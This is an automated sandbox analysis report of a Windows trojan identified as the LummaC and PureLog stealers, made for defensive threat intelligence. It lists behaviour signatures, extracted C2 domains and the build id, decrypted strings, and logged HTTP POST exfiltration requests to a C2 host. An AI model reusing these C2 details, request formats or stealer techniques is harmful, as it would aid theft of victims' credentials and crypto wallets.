Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Analysis ID:1447065
MD5:99bba7a8fb2a5f15924d1673cfe3a72b
SHA1:7c645451ea48d31736f8866781682ef5e192e186
SHA256:52137b032c46dfa0c74ce28eb0610f22c68a22b6fa2481505b9decdb268d7ae2
Tags:exe
Infos:

Detection

LummaC, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected PureLog Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe (PID: 1048 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe" MD5: 99BBA7A8FB2A5F15924D1673CFE3A72B)
    • MSBuild.exe (PID: 5316 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "slamcopynammeks.shop"], "Build id": "RTSCf2--Sunaru"}
SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Process Memory Space: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe PID: 1048JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: MSBuild.exe PID: 5316JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: MSBuild.exe PID: 5316JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                  SourceRuleDescriptionAuthorStrings
                  0.0.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.3f0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.12.112, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5316, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeAvira: detected
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.1048.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "slamcopynammeks.shop"], "Build id": "RTSCf2--Sunaru"}
                    Source: employhabragaomlsp.shopVirustotal: Detection: 11%Perma Link
                    Source: roomabolishsnifftwk.shopVirustotal: Detection: 11%Perma Link
                    Source: civilianurinedtsraov.shopVirustotal: Detection: 11%Perma Link
                    Source: averageaattractiionsl.shopVirustotal: Detection: 10%Perma Link
                    Source: https://slamcopynammeks.shop:443/apiVirustotal: Detection: 9%Perma Link
                    Source: https://slamcopynammeks.shop/apiVirustotal: Detection: 9%Perma Link
                    Source: stalfbaclcalorieeis.shopVirustotal: Detection: 10%Perma Link
                    Source: femininiespywageg.shopVirustotal: Detection: 12%Perma Link
                    Source: buttockdecarderwiso.shopVirustotal: Detection: 11%Perma Link
                    Source: museumtespaceorsp.shopVirustotal: Detection: 10%Perma Link
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeVirustotal: Detection: 65%Perma Link
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeReversingLabs: Detection: 78%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeJoe Sandbox ML: detected
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: roomabolishsnifftwk.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: civilianurinedtsraov.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: stalfbaclcalorieeis.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: employhabragaomlsp.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: femininiespywageg.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: averageaattractiionsl.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: buttockdecarderwiso.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: museumtespaceorsp.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: slamcopynammeks.shop
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: RTSCf2--Sunaru
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEEDD20 CryptReleaseContext,0_2_6CEEDD20
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEEDEE0 CryptReleaseContext,0_2_6CEEDEE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEEDE00 CryptGenRandom,__CxxThrowException@8,0_2_6CEEDE00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEED9D0 CryptAcquireContextA,GetLastError,0_2_6CEED9D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEEDBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,0_2_6CEEDBB0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF135E0 CryptReleaseContext,0_2_6CF135E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEED7F0 CryptReleaseContext,0_2_6CEED7F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEED7D3 CryptReleaseContext,0_2_6CEED7D3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041592F CryptUnprotectData,2_2_0041592F
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.00000000067E0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.0000000005839000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000056B1000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
                    Source: Binary string: C:\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Packets\obj\Release\PcapDotNet.Packets.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000058F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.000000000576B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.000000000689A000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 4x nop then jmp 071120DAh0_2_07112020
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 4x nop then jmp 071120DAh0_2_07112028
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_071124F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_071124E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_00416114
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]2_2_004382A6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [esi]2_2_004263C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_004263C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_004263C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [esi]2_2_00427572
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, dword ptr [esp+0000008Ch]2_2_0041C670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3Dh]2_2_004047F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp cl, 0000005Ch2_2_004028F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_00416C59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_00416C59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], di2_2_00416C59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_00416C59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], di2_2_00416C59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add esi, 02h2_2_00414E3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00414E3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [esi]2_2_0041CEF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then inc ebx2_2_004141A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [esi]2_2_004263D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_004263D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_004263D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea ebp, dword ptr [esp+03h]2_2_004243A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [esp+70h]2_2_00409440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]2_2_0043C470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004374A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9EDBE8FEh2_2_004374A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004374A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9EDBE8FEh2_2_004374A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor eax, eax2_2_00421570
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00421570
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]2_2_0043864A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp ecx2_2_0041C64A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0040C630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00424750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], dx2_2_0042371B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp byte ptr [edx+eax+01h], 00000000h2_2_0041297F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], A352EDFDh2_2_0041BA8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp eax2_2_00413AA5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [esp+000001B8h]2_2_00413BC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp eax2_2_00421BD3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, dword ptr [esi]2_2_00423C0E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 904D52BCh2_2_0043BC30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [esi]2_2_00422D80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h2_2_00410DA2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00432DB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00426E7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00426EF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00426F4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [eax+esi]2_2_00402F50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx ebp, byte ptr [eax]2_2_0043AF50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then push ebx2_2_00412F59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor eax, eax2_2_00420FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00420FE0

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: roomabolishsnifftwk.shop
                    Source: Malware configuration extractorURLs: civilianurinedtsraov.shop
                    Source: Malware configuration extractorURLs: stalfbaclcalorieeis.shop
                    Source: Malware configuration extractorURLs: employhabragaomlsp.shop
                    Source: Malware configuration extractorURLs: femininiespywageg.shop
                    Source: Malware configuration extractorURLs: averageaattractiionsl.shop
                    Source: Malware configuration extractorURLs: buttockdecarderwiso.shop
                    Source: Malware configuration extractorURLs: museumtespaceorsp.shop
                    Source: Malware configuration extractorURLs: slamcopynammeks.shop
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: slamcopynammeks.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: slamcopynammeks.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: slamcopynammeks.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15078Host: slamcopynammeks.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: slamcopynammeks.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7089Host: slamcopynammeks.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1258Host: slamcopynammeks.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585805Host: slamcopynammeks.shop
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: slamcopynammeks.shop
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: slamcopynammeks.shop
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
